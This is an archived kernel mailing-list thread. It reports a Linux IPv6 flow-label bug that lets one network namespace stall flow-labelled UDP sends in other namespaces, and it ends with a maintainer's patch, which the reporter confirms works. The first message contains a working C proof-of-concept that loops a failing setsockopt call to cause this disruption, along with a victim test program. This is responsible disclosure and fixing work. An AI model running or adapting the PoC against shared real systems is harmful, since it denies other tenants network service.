netdev.vger.kernel.org archive mirror
 help / color / mirror / Atom feed
* BUG: potential net namespace bug in IPv6 flow label management
@ 2022-02-13 10:31 Liu, Congyu
  2022-02-13 16:10 ` Willem de Bruijn
  0 siblings, 1 reply; 5+ messages in thread
From: Liu, Congyu @ 2022-02-13 10:31 UTC (permalink / raw)
  To: willemb, security, oss-security, netdev


Hi,

In the test conducted on namespace, I found that one unsuccessful IPv6 flow label 
management from one net ns could stop other net ns's data transmission that requests 
flow label for a short time. Specifically, in our test case, one unsuccessful 
`setsockopt` to get flow label will affect other net ns's `sendmsg` with flow label 
set in cmsg. A simple PoC is included for verification. The behavior described above
can be reproduced on the latest kernel.

I managed to figure out the data flow behind this: when asking to get a flow label, 
some `setsockopt` parameters can trigger function `ipv6_flowlabel_get` to call `fl_create` 
to allocate an exclusive flow label, then call `fl_release` to release it before returning 
-ENOENT. Global variable `ipv6_flowlabel_exclusive`, a rate limit jump label that keeps 
track of number of alive exclusive flow labels, will get increased instantly after calling 
`fl_create`. Due to its rate limit design, `ipv6_flowlabel_exclusive` can only decrease 
sometime later after calling `fl_decrease`. During this period, if data transmission function 
in other net ns (e.g. `udpv6_sendmsg`) calls `fl_lookup`, the false `ipv6_flowlabel_exclusive` 
will invoke the `__fl_lookup`. In the test case observed, this function returns error and 
eventually stops the data transmission.

I further noticed that this bug could be exploitable: if `setsockopt` is called
continuously, then `sendmmsg` calls from other net ns will be blocked forever. Using the PoC
provided, if the attack and victim programs run simultaneously, the victim program cannot transmit
data; without the attack program running, the victim program can transmit data normally.

Thanks,
Congyu




Attack Program:

#define _GNU_SOURCE
#include <linux/in6.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <error.h>
#include <errno.h>
#include <sched.h>
#include <stdbool.h>


/*
 * Attack program: moves into a new network namespace, opens an IPv6
 * UDP-Lite datagram socket and then issues the same IPV6_FL_A_GET
 * flow label request on it in an endless loop.
 *
 * The request uses label 0, no flags and IPV6_FL_S_USER sharing, with
 * destination fd00::1. According to the report above, this setsockopt is
 * the unsuccessful call whose side effect disturbs other namespaces.
 *
 * Never returns normally; exits with status 1 if the namespace or the
 * socket cannot be created.
 */
int main() {
	int fd1;

	/*
	 * If unshare fails we would keep running in the caller's namespace
	 * and the PoC would no longer show cross-namespace interference,
	 * so treat it as fatal.
	 */
	if (unshare(CLONE_NEWNET) < 0)
		error(1, errno, "unshare");
	if ((fd1 = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDPLITE)) < 0)
		error(1, errno, "socket");
	struct in6_flowlabel_req req = {
		.flr_action = IPV6_FL_A_GET,
		.flr_label = 0,
		.flr_flags = 0,
		.flr_share = IPV6_FL_S_USER,
	};
	/* Destination fd00::1 (only the first and last address bytes are set). */
	req.flr_dst.s6_addr[0] = 0xfd;
	req.flr_dst.s6_addr[15] = 0x1;

	/* The result is deliberately ignored: only the repeated call matters. */
	while (1)
		(void)setsockopt(fd1, SOL_IPV6, IPV6_FLOWLABEL_MGR, &req, sizeof(req));

	return 0;
}



Victim program:

#define _GNU_SOURCE
#include <linux/in6.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <error.h>
#include <errno.h>
#include <sched.h>
#include <stdbool.h>

/* Payload for the test datagrams; sizeof(cfg_data) counts the trailing NUL. */
static const char cfg_data[] = "a";

/*
 * Send one datagram containing cfg_data (including its trailing NUL) to
 * addr on socket fd, and print the sendmsg() return value to stderr.
 *
 * fd:             socket to send on
 * addr:           destination address, passed by value
 * with_flowlabel: when true, attach an SOL_IPV6/IPV6_FLOWINFO control
 *                 message carrying flowlabel
 * flowlabel:      flow label in host byte order; converted with htonl()
 */
static void do_send(int fd, struct sockaddr_in6 addr, bool with_flowlabel, uint32_t flowlabel)
{
	/*
	 * Ancillary data must be suitably aligned for struct cmsghdr; a bare
	 * char array gives no such guarantee, hence the union (see cmsg(3)).
	 */
	union {
		char buf[CMSG_SPACE(sizeof(flowlabel))];
		struct cmsghdr align;
	} control = {0};
	struct msghdr msg = {0};
	struct iovec iov = {0};
	int ret;

	iov.iov_base = (char *)cfg_data;
	iov.iov_len = sizeof(cfg_data);

	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	msg.msg_name = &addr;
	msg.msg_namelen = sizeof(addr);

	if (with_flowlabel) {
		uint32_t flowinfo = htonl(flowlabel);
		struct cmsghdr *cm;

		msg.msg_control = control.buf;
		msg.msg_controllen = sizeof(control.buf);

		cm = CMSG_FIRSTHDR(&msg);
		cm->cmsg_len = CMSG_LEN(sizeof(flowinfo));
		cm->cmsg_level = SOL_IPV6;
		cm->cmsg_type = IPV6_FLOWINFO;
		/* memcpy avoids a type-punned store into the char buffer. */
		memcpy(CMSG_DATA(cm), &flowinfo, sizeof(flowinfo));
	}

	ret = (int)sendmsg(fd, &msg, 0);

	fprintf(stderr, "sendmsg ret = %d\n", ret);
}

/*
 * Receive one datagram on fd and discard it.
 *
 * fd:             socket to receive on
 * with_flowlabel: unused; kept so existing callers need no change
 * expect:         only its size is used, to size the control buffer
 *
 * The received payload and control data are not inspected. A failing
 * recvmsg() is reported on stderr but does not terminate the program.
 */
static void do_recv(int fd, bool with_flowlabel, uint32_t expect)
{
	/* Union keeps the ancillary buffer aligned for struct cmsghdr (cmsg(3)). */
	union {
		char buf[CMSG_SPACE(sizeof(expect))];
		struct cmsghdr align;
	} control;
	char data[sizeof(cfg_data)];
	struct msghdr msg = {0};
	struct iovec iov = {0};

	(void)with_flowlabel;

	iov.iov_base = data;
	iov.iov_len = sizeof(data);

	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;

	memset(&control, 0, sizeof(control));
	msg.msg_control = control.buf;
	msg.msg_controllen = sizeof(control.buf);

	/* Status 0 makes error() print the message and return instead of exiting. */
	if (recvmsg(fd, &msg, 0) < 0)
		error(0, errno, "recvmsg");
}

/*
 * Victim program: in a new network namespace, bring up the loopback
 * interface, fork a receiver bound to [::1]:8000, and then send a
 * datagram with flow label 123456 to it every 100 ms, printing each
 * sendmsg() result.
 *
 * Never returns normally; exits with status 1 if namespace, process or
 * socket setup fails.
 */
int main() {
	int fd2, pid;

	if (unshare(CLONE_NEWNET) < 0)
		error(1, errno, "unshare");

	/* Helper child: run "ip link set dev lo up" in the new namespace. */
	pid = fork();
	if (pid < 0)
		error(1, errno, "fork");
	if (pid == 0) {
		execlp("ip", "ip", "link", "set", "dev", "lo", "up", (char *)NULL);
		/*
		 * execlp only returns on failure. Exit here so the child does
		 * not fall through and run the rest of main as a second victim.
		 */
		error(1, errno, "execlp");
	}
	/* Give the helper time to finish before loopback is used. */
	sleep(1);

	struct sockaddr_in6 dst_addr = {
		.sin6_family = AF_INET6,
		.sin6_port = htons(8000),
		.sin6_addr = in6addr_loopback,
		.sin6_flowinfo = htonl(0),
		.sin6_scope_id = 0,
	};

	/* Receiver child: bind to the destination and drain datagrams forever. */
	pid = fork();
	if (pid < 0)
		error(1, errno, "fork");
	if (pid == 0) {
		if ((fd2 = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP)) < 0)
			error(1, errno, "socket");
		if (bind(fd2, (void *)&dst_addr, sizeof(dst_addr)) < 0)
			error(1, errno, "bind");
		while (1) {
			do_recv(fd2, true, 123456);
		}
		return 0;
	}
	/* Give the receiver time to bind before the first send. */
	sleep(1);

	/* Sender: one datagram with the flow label every 100 ms. */
	if ((fd2 = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP)) < 0)
		error(1, errno, "socket");
	while (1) {
		do_send(fd2, dst_addr, true, 123456);
		usleep(100000);
	}

	return 0;
}

^ permalink raw reply	[flat|nested] 5+ messages in thread

* Re: BUG: potential net namespace bug in IPv6 flow label management
  2022-02-13 10:31 BUG: potential net namespace bug in IPv6 flow label management Liu, Congyu
@ 2022-02-13 16:10 ` Willem de Bruijn
  2022-02-13 23:47   ` Willem de Bruijn
  0 siblings, 1 reply; 5+ messages in thread
From: Willem de Bruijn @ 2022-02-13 16:10 UTC (permalink / raw)
  To: Liu, Congyu; +Cc: security, oss-security, netdev

On Sun, Feb 13, 2022 at 5:31 AM Liu, Congyu <liu3101@purdue.edu> wrote:
>
>
> Hi,
>
> In the test conducted on namespace, I found that one unsuccessful IPv6 flow label
> management from one net ns could stop other net ns's data transmission that requests
> flow label for a short time. Specifically, in our test case, one unsuccessful
> `setsockopt` to get flow label will affect other net ns's `sendmsg` with flow label
> set in cmsg. Simple PoC is included for verification. The behavior described above
> can be reproduced in latest kernel.
>
> I managed to figure out the data flow behind this: when asking to get a flow label,
> some `setsockopt` parameters can trigger function `ipv6_flowlabel_get` to call `fl_create`
> to allocate an exclusive flow label, then call `fl_release` to release it before returning
> -ENOENT. Global variable `ipv6_flowlabel_exclusive`, a rate limit jump label that keeps
> track of number of alive exclusive flow labels, will get increased instantly after calling
> `fl_create`. Due to its rate limit design, `ipv6_flowlabel_exclusive` can only decrease
> sometime later after calling `fl_decrease`. During this period, if data transmission function
> in other net ns (e.g. `udpv6_sendmsg`) calls `fl_lookup`, the false `ipv6_flowlabel_exclusive`
> will invoke the `__fl_lookup`. In the test case observed, this function returns error and
> eventually stops the data transmission.
>
> I further noticed that this bug could somehow be vulnerable: if `setsockopt` is called
> continuously, then `sendmmsg` call from other net ns will be blocked forever. Using the PoC
> provided, if attack and victim programs are running simultaneously, victim program cannot transmit
> data; when running without attack program, the victim program can transmit data normally.

Thanks for the clear explanation.

Being able to use flowlabels without explicitly registering them
through a setsockopt is a fast path optimization introduced in commit
59c820b2317f ("ipv6: elide flowlabel check if no exclusive leases
exist").

Before this, any use of flowlabels required registering them, whether
the use was exclusive or not. As autoflowlabels already skipped this
stateful action, the commit extended this fast path to all non-exclusive
use. But if any exclusive flowlabel is active, to protect it, all
other flowlabel use has to be registered too.

The commit message does state

    This is an optimization. Robust applications still have to revert to
    requesting leases if the fast path fails due to an exclusive lease.

Though I can see how the changed behavior has changed the perception of the API.

That this extends up to a second after release of the last exclusive
flowlabel due to deferred release is only tangential to the issue?

Flowlabels are stored globally, but associated with a netns
(fl->fl_net). Perhaps we can add a per-netns check to the
static_branch and maintain stateless behavior in other netns, even if
some netns maintain exclusive leases.

^ permalink raw reply	[flat|nested] 5+ messages in thread

* Re: BUG: potential net namespace bug in IPv6 flow label management
  2022-02-13 16:10 ` Willem de Bruijn
@ 2022-02-13 23:47   ` Willem de Bruijn
  2022-02-14  0:48     ` Willem de Bruijn
  0 siblings, 1 reply; 5+ messages in thread
From: Willem de Bruijn @ 2022-02-13 23:47 UTC (permalink / raw)
  To: Willem de Bruijn; +Cc: Liu, Congyu, security, netdev

On Sun, Feb 13, 2022 at 11:10 AM Willem de Bruijn
<willemdebruijn.kernel@gmail.com> wrote:
>
> On Sun, Feb 13, 2022 at 5:31 AM Liu, Congyu <liu3101@purdue.edu> wrote:
> >
> >
> > Hi,
> >
> > In the test conducted on namespace, I found that one unsuccessful IPv6 flow label
> > management from one net ns could stop other net ns's data transmission that requests
> > flow label for a short time. Specifically, in our test case, one unsuccessful
> > `setsockopt` to get flow label will affect other net ns's `sendmsg` with flow label
> > set in cmsg. Simple PoC is included for verification. The behavior described above
> > can be reproduced in latest kernel.
> >
> > I managed to figure out the data flow behind this: when asking to get a flow label,
> > some `setsockopt` parameters can trigger function `ipv6_flowlabel_get` to call `fl_create`
> > to allocate an exclusive flow label, then call `fl_release` to release it before returning
> > -ENOENT. Global variable `ipv6_flowlabel_exclusive`, a rate limit jump label that keeps
> > track of number of alive exclusive flow labels, will get increased instantly after calling
> > `fl_create`. Due to its rate limit design, `ipv6_flowlabel_exclusive` can only decrease
> > sometime later after calling `fl_decrease`. During this period, if data transmission function
> > in other net ns (e.g. `udpv6_sendmsg`) calls `fl_lookup`, the false `ipv6_flowlabel_exclusive`
> > will invoke the `__fl_lookup`. In the test case observed, this function returns error and
> > eventually stops the data transmission.
> >
> > I further noticed that this bug could somehow be vulnerable: if `setsockopt` is called
> > continuously, then `sendmmsg` call from other net ns will be blocked forever. Using the PoC
> > provided, if attack and victim programs are running simultaneously, victim program cannot transmit
> > data; when running without attack program, the victim program can transmit data normally.
>
> Thanks for the clear explanation.
>
> Being able to use flowlabels without explicitly registering them
> through a setsockopt is a fast path optimization introduced in commit
> 59c820b2317f ("ipv6: elide flowlabel check if no exclusive leases
> exist").
>
> Before this, any use of flowlabels required registering them, whether
> the use was exclusive or not. As autoflowlabels already skipped this
> stateful action, the commit extended this fast path to all non-exclusive
> use. But if any exclusive flowlabel is active, to protect it, all
> other flowlabel use has to be registered too.
>
> The commit message does state
>
>     This is an optimization. Robust applications still have to revert to
>     requesting leases if the fast path fails due to an exclusive lease.
>
> Though I can see how the changed behavior has changed the perception of the API.
>
> That this extends up to a second after release of the last exclusive
> flowlabel due to deferred release is only tangential to the issue?
>
> Flowlabels are stored globally, but associated with a netns
> (fl->fl_net). Perhaps we can add a per-netns check to the
> static_branch and maintain stateless behavior in other netns, even if
> some netns maintain exclusive leases.

The specific issue could be avoided by moving

       if (fl_shared_exclusive(fl) || fl->opt)
               static_branch_deferred_inc(&ipv6_flowlabel_exclusive);

until later in ipv6_flowlabel_get, after the ENOENT response.

But reserving a flowlabel is not a privileged operation, including for
exclusive use. So the attack program can just be revised to pass
IPV6_FL_F_CREATE and hold a real reservation. Then it also does
not have to retry in a loop.

The drop behavior is fully under control of the victim. If it reserves
the flowlabel it intends to use, then the issue does not occur. For
this reason I don't see this as a vulnerability.

But the behavior is non-obvious and it is preferable to isolate netns
from each other. I'm looking into whether we can add a per-netns
"has exclusive leases" check.

^ permalink raw reply	[flat|nested] 5+ messages in thread

* Re: BUG: potential net namespace bug in IPv6 flow label management
  2022-02-13 23:47   ` Willem de Bruijn
@ 2022-02-14  0:48     ` Willem de Bruijn
  2022-02-14  1:36       ` Liu, Congyu
  0 siblings, 1 reply; 5+ messages in thread
From: Willem de Bruijn @ 2022-02-14  0:48 UTC (permalink / raw)
  To: Willem de Bruijn; +Cc: Liu, Congyu, security, netdev

On Sun, Feb 13, 2022 at 6:47 PM Willem de Bruijn
<willemdebruijn.kernel@gmail.com> wrote:
>
> On Sun, Feb 13, 2022 at 11:10 AM Willem de Bruijn
> <willemdebruijn.kernel@gmail.com> wrote:
> >
> > On Sun, Feb 13, 2022 at 5:31 AM Liu, Congyu <liu3101@purdue.edu> wrote:
> > >
> > >
> > > Hi,
> > >
> > > In the test conducted on namespace, I found that one unsuccessful IPv6 flow label
> > > management from one net ns could stop other net ns's data transmission that requests
> > > flow label for a short time. Specifically, in our test case, one unsuccessful
> > > `setsockopt` to get flow label will affect other net ns's `sendmsg` with flow label
> > > set in cmsg. Simple PoC is included for verification. The behavior described above
> > > can be reproduced in latest kernel.
> > >
> > > I managed to figure out the data flow behind this: when asking to get a flow label,
> > > some `setsockopt` parameters can trigger function `ipv6_flowlabel_get` to call `fl_create`
> > > to allocate an exclusive flow label, then call `fl_release` to release it before returning
> > > -ENOENT. Global variable `ipv6_flowlabel_exclusive`, a rate limit jump label that keeps
> > > track of number of alive exclusive flow labels, will get increased instantly after calling
> > > `fl_create`. Due to its rate limit design, `ipv6_flowlabel_exclusive` can only decrease
> > > sometime later after calling `fl_decrease`. During this period, if data transmission function
> > > in other net ns (e.g. `udpv6_sendmsg`) calls `fl_lookup`, the false `ipv6_flowlabel_exclusive`
> > > will invoke the `__fl_lookup`. In the test case observed, this function returns error and
> > > eventually stops the data transmission.
> > >
> > > I further noticed that this bug could somehow be vulnerable: if `setsockopt` is called
> > > continuously, then `sendmmsg` call from other net ns will be blocked forever. Using the PoC
> > > provided, if attack and victim programs are running simultaneously, victim program cannot transmit
> > > data; when running without attack program, the victim program can transmit data normally.
> >
> > Thanks for the clear explanation.
> >
> > Being able to use flowlabels without explicitly registering them
> > through a setsockopt is a fast path optimization introduced in commit
> > 59c820b2317f ("ipv6: elide flowlabel check if no exclusive leases
> > exist").
> >
> > Before this, any use of flowlabels required registering them, whether
> > the use was exclusive or not. As autoflowlabels already skipped this
> > stateful action, the commit extended this fast path to all non-exclusive
> > use. But if any exclusive flowlabel is active, to protect it, all
> > other flowlabel use has to be registered too.
> >
> > The commit message does state
> >
> >     This is an optimization. Robust applications still have to revert to
> >     requesting leases if the fast path fails due to an exclusive lease.
> >
> > Though I can see how the changed behavior has changed the perception of the API.
> >
> > That this extends up to a second after release of the last exclusive
> > flowlabel due to deferred release is only tangential to the issue?
> >
> > Flowlabels are stored globally, but associated with a netns
> > (fl->fl_net). Perhaps we can add a per-netns check to the
> > static_branch and maintain stateless behavior in other netns, even if
> > some netns maintain exclusive leases.
>
> The specific issue could be avoided by moving
>
>        if (fl_shared_exclusive(fl) || fl->opt)
>                static_branch_deferred_inc(&ipv6_flowlabel_exclusive);
>
> until later in ipv6_flowlabel_get, after the ENOENT response.
>
> But reserving a flowlabel is not a privileged operation, including for
> exclusive use. So the attack program can just be revised to pass
> IPV6_FL_F_CREATE and hold a real reservation. Then it also does
> not have to retry in a loop.
>
> The drop behavior is fully under control of the victim. If it reserves
> the flowlabel it intends to use, then the issue does not occur. For
> this reason I don't see this as a vulnerability.
>
> But the behavior is non-obvious and it is preferable to isolate netns
> from each other. I'm looking into whether we can add a per-netns
> "has exclusive leases" check.

Easiest is just to mark the netns as requiring the check only once it
starts having exclusive labels:

+++ b/include/net/ipv6.h
@@ -399,7 +399,8 @@ extern struct static_key_false_deferred
ipv6_flowlabel_exclusive;
 static inline struct ip6_flowlabel *fl6_sock_lookup(struct sock *sk,
                                                    __be32 label)
 {
-       if (static_branch_unlikely(&ipv6_flowlabel_exclusive.key))
+       if (static_branch_unlikely(&ipv6_flowlabel_exclusive.key) &&
+           READ_ONCE(sock_net(sk)->ipv6.flowlabel_has_excl))
                return __fl6_sock_lookup(sk, label) ? : ERR_PTR(-ENOENT);

@@ -77,9 +77,10 @@ struct netns_ipv6 {
        spinlock_t              fib6_gc_lock;
        unsigned int             ip6_rt_gc_expire;
        unsigned long            ip6_rt_last_gc;
+       unsigned char           flowlabel_has_excl;
 #ifdef CONFIG_IPV6_MULTIPLE_TABLES
-       unsigned int            fib6_rules_require_fldissect;
        bool                    fib6_has_custom_rules;
+       unsigned int            fib6_rules_require_fldissect;

+++ b/net/ipv6/ip6_flowlabel.c
@@ -450,8 +450,10 @@ fl_create(struct net *net, struct sock *sk,
struct in6_flowlabel_req *freq,
                err = -EINVAL;
                goto done;
        }
-       if (fl_shared_exclusive(fl) || fl->opt)
+       if (fl_shared_exclusive(fl) || fl->opt) {
+               WRITE_ONCE(sock_net(sk)->ipv6.flowlabel_has_excl, 1);
                static_branch_deferred_inc(&ipv6_flowlabel_exclusive);
+       }
        return fl;

Clearing flowlabel_has_excl when it stops using labels is more complex,
requiring either an atomic_t or walking the entire flowlabel hashtable on
each flowlabel free in the namespace. It can be skipped.

^ permalink raw reply	[flat|nested] 5+ messages in thread

* Re: BUG: potential net namespace bug in IPv6 flow label management
  2022-02-14  0:48     ` Willem de Bruijn
@ 2022-02-14  1:36       ` Liu, Congyu
  0 siblings, 0 replies; 5+ messages in thread
From: Liu, Congyu @ 2022-02-14  1:36 UTC (permalink / raw)
  To: Willem de Bruijn; +Cc: security, netdev

Thank you! I just tested the patch using previous PoC. The bug is fixed.

Thanks,
Congyu
________________________________________
From: Willem de Bruijn <willemdebruijn.kernel@gmail.com>
Sent: Sunday, February 13, 2022 19:48
To: Willem de Bruijn
Cc: Liu, Congyu; security@kernel.org; netdev@vger.kernel.org
Subject: Re: BUG: potential net namespace bug in IPv6 flow label management

On Sun, Feb 13, 2022 at 6:47 PM Willem de Bruijn
<willemdebruijn.kernel@gmail.com> wrote:
>
> On Sun, Feb 13, 2022 at 11:10 AM Willem de Bruijn
> <willemdebruijn.kernel@gmail.com> wrote:
> >
> > On Sun, Feb 13, 2022 at 5:31 AM Liu, Congyu <liu3101@purdue.edu> wrote:
> > >
> > >
> > > Hi,
> > >
> > > In the test conducted on namespace, I found that one unsuccessful IPv6 flow label
> > > management from one net ns could stop other net ns's data transmission that requests
> > > flow label for a short time. Specifically, in our test case, one unsuccessful
> > > `setsockopt` to get flow label will affect other net ns's `sendmsg` with flow label
> > > set in cmsg. Simple PoC is included for verification. The behavior described above
> > > can be reproduced in latest kernel.
> > >
> > > I managed to figure out the data flow behind this: when asking to get a flow label,
> > > some `setsockopt` parameters can trigger function `ipv6_flowlabel_get` to call `fl_create`
> > > to allocate an exclusive flow label, then call `fl_release` to release it before returning
> > > -ENOENT. Global variable `ipv6_flowlabel_exclusive`, a rate limit jump label that keeps
> > > track of number of alive exclusive flow labels, will get increased instantly after calling
> > > `fl_create`. Due to its rate limit design, `ipv6_flowlabel_exclusive` can only decrease
> > > sometime later after calling `fl_decrease`. During this period, if data transmission function
> > > in other net ns (e.g. `udpv6_sendmsg`) calls `fl_lookup`, the false `ipv6_flowlabel_exclusive`
> > > will invoke the `__fl_lookup`. In the test case observed, this function returns error and
> > > eventually stops the data transmission.
> > >
> > > I further noticed that this bug could somehow be vulnerable: if `setsockopt` is called
> > > continuously, then `sendmmsg` call from other net ns will be blocked forever. Using the PoC
> > > provided, if attack and victim programs are running simultaneously, victim program cannot transmit
> > > data; when running without attack program, the victim program can transmit data normally.
> >
> > Thanks for the clear explanation.
> >
> > Being able to use flowlabels without explicitly registering them
> > through a setsockopt is a fast path optimization introduced in commit
> > 59c820b2317f ("ipv6: elide flowlabel check if no exclusive leases
> > exist").
> >
> > Before this, any use of flowlabels required registering them, whether
> > the use was exclusive or not. As autoflowlabels already skipped this
> > stateful action, the commit extended this fast path to all non-exclusive
> > use. But if any exclusive flowlabel is active, to protect it, all
> > other flowlabel use has to be registered too.
> >
> > The commit message does state
> >
> >     This is an optimization. Robust applications still have to revert to
> >     requesting leases if the fast path fails due to an exclusive lease.
> >
> > Though I can see how the changed behavior has changed the perception of the API.
> >
> > That this extends up to a second after release of the last exclusive
> > flowlabel due to deferred release is only tangential to the issue?
> >
> > Flowlabels are stored globally, but associated with a netns
> > (fl->fl_net). Perhaps we can add a per-netns check to the
> > static_branch and maintain stateless behavior in other netns, even if
> > some netns maintain exclusive leases.
>
> The specific issue could be avoided by moving
>
>        if (fl_shared_exclusive(fl) || fl->opt)
>                static_branch_deferred_inc(&ipv6_flowlabel_exclusive);
>
> until later in ipv6_flowlabel_get, after the ENOENT response.
>
> But reserving a flowlabel is not a privileged operation, including for
> exclusive use. So the attack program can just be revised to pass
> IPV6_FL_F_CREATE and hold a real reservation. Then it also does
> not have to retry in a loop.
>
> The drop behavior is fully under control of the victim. If it reserves
> the flowlabel it intends to use, then the issue does not occur. For
> this reason I don't see this as a vulnerability.
>
> But the behavior is non-obvious and it is preferable to isolate netns
> from each other. I'm looking into whether we can add a per-netns
> "has exclusive leases" check.

Easiest is just to mark the netns as requiring the check only once it
starts having exclusive labels:

+++ b/include/net/ipv6.h
@@ -399,7 +399,8 @@ extern struct static_key_false_deferred
ipv6_flowlabel_exclusive;
 static inline struct ip6_flowlabel *fl6_sock_lookup(struct sock *sk,
                                                    __be32 label)
 {
-       if (static_branch_unlikely(&ipv6_flowlabel_exclusive.key))
+       if (static_branch_unlikely(&ipv6_flowlabel_exclusive.key) &&
+           READ_ONCE(sock_net(sk)->ipv6.flowlabel_has_excl))
                return __fl6_sock_lookup(sk, label) ? : ERR_PTR(-ENOENT);

@@ -77,9 +77,10 @@ struct netns_ipv6 {
        spinlock_t              fib6_gc_lock;
        unsigned int             ip6_rt_gc_expire;
        unsigned long            ip6_rt_last_gc;
+       unsigned char           flowlabel_has_excl;
 #ifdef CONFIG_IPV6_MULTIPLE_TABLES
-       unsigned int            fib6_rules_require_fldissect;
        bool                    fib6_has_custom_rules;
+       unsigned int            fib6_rules_require_fldissect;

+++ b/net/ipv6/ip6_flowlabel.c
@@ -450,8 +450,10 @@ fl_create(struct net *net, struct sock *sk,
struct in6_flowlabel_req *freq,
                err = -EINVAL;
                goto done;
        }
-       if (fl_shared_exclusive(fl) || fl->opt)
+       if (fl_shared_exclusive(fl) || fl->opt) {
+               WRITE_ONCE(sock_net(sk)->ipv6.flowlabel_has_excl, 1);
                static_branch_deferred_inc(&ipv6_flowlabel_exclusive);
+       }
        return fl;

Clearing flowlabel_has_excl when it stops using labels is more complex,
requiring either an atomic_t or walking the entire flowlabel hashtable on
each flowlabel free in the namespace. It can be skipped.

^ permalink raw reply	[flat|nested] 5+ messages in thread

end of thread, other threads:[~2022-02-14  1:36 UTC | newest]

Thread overview: 5+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2022-02-13 10:31 BUG: potential net namespace bug in IPv6 flow label management Liu, Congyu
2022-02-13 16:10 ` Willem de Bruijn
2022-02-13 23:47   ` Willem de Bruijn
2022-02-14  0:48     ` Willem de Bruijn
2022-02-14  1:36       ` Liu, Congyu

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).